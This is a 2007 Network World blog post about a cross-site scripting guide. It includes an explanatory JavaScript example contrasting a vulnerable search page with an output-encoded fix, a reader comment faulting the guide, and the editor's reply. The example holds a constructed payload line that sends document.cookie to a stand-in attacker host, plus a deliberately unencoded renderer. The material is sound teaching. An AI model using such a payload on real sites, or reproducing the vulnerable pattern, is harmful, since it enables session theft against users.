
Network World

Julie Bort

Protect yourself from cross site scripting

By Microsoft Subnet on Wed, 09/05/07 - 3:28pm.

WindowsSecurity.com published a guide today that promises to teach you everything you need to know about understanding and preventing the cross site scripting (XSS) attack.

XSS is an extremely common application-layer web attack. The attacker gets a malicious script embedded in a page served by a site the victim trusts; when the victim's browser loads that page, it executes the script with the trusted site's own privileges, in that site's origin, with access to its cookies and DOM. This is a common method used by botherders to acquire zombies.
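The mechanism above, as an added example that is not from the WindowsSecurity.com guide or from this post: a reflected XSS in a search-results page, shown beside an output-encoded version. The function names, the attacker host (attacker.example) and the payload are all hypothetical and constructed for illustration.

```javascript
// Added example (not from the guide or the Network World post).
// Demonstrates a reflected XSS in a server-rendered search page and the
// output-encoding fix. All names here are hypothetical.

// Minimal HTML entity encoding for untrusted text placed between tags.
// '&' must be encoded first so the other replacements are not re-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query parameter is echoed into the page unchanged, so a
// crafted link carries script that the victim's browser runs in the
// vulnerable site's own origin.
function renderSearchPageVulnerable(query) {
  return `<html><body><p>Results for: ${query}</p></body></html>`;
}

// Hardened: the query is entity-encoded before it is placed in HTML text,
// so the browser renders the payload as literal characters.
function renderSearchPageSafe(query) {
  return `<html><body><p>Results for: ${escapeHtml(query)}</p></body></html>`;
}

// Constructed payload of the kind a crafted link would carry. It reads
// document.cookie of the VULNERABLE site and sends it to the attacker's
// host. The attacker's own site cannot read those cookies; this script can
// only because it executes inside the trusted site's page (same origin).
const PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>";

// Crude check used only to compare the two renderers: does the rendered
// HTML contain a live <script> tag that a browser would execute?
function containsExecutableScript(html) {
  return /<script\b/i.test(html);
}

// Render both pages for the same attacker-controlled query and report
// whether each one would execute the payload.
function demo(query) {
  return {
    vulnerableExecutes: containsExecutableScript(renderSearchPageVulnerable(query)),
    safeExecutes: containsExecutableScript(renderSearchPageSafe(query)),
    safeHtml: renderSearchPageSafe(query),
  };
}

console.log(demo(PAYLOAD));
```

Output encoding has to match the context the data lands in (HTML text here; attribute values, URLs and script blocks each need their own encoder). Marking the session cookie HttpOnly is a worthwhile second layer, since it keeps document.cookie out of reach of injected script, but it does not stop the script from acting on the user's behalf within the page.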

Says the guide:

"Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits."

Worst Article Ever


I read the article that this story links to and spent the next few minutes laughing and yelling at my screen. The description of how XSS works, "by sending the user to a different site that steals their session cookie", is wrong! The 'other' site doesn't have access to your cookies!!

Then, in the paragraph after the example, they say that this approach is used in spam emails too: "A user is sent an email saying that their account has been compromised and they need to click a link to fix it, but the link directs them to a different evil page." That isn't XSS, that is phishing spam!

And where in the article does it suggest a fix? It doesn't. NW, did you actually read this article?

Well, then, never mind



I'm the editor at Network World that posted this. I'm out there searching around for Microsoft-related news from other sites as part of Microsoft Subnet coverage. There is very little that Microsoft does that NWW doesn't already cover, so sometimes I go to the fringes a bit. I did read the article, but apparently not carefully enough.

Tell you what ... you send me Microsoft articles that you like. E-mail the links to me at jbort@nww.

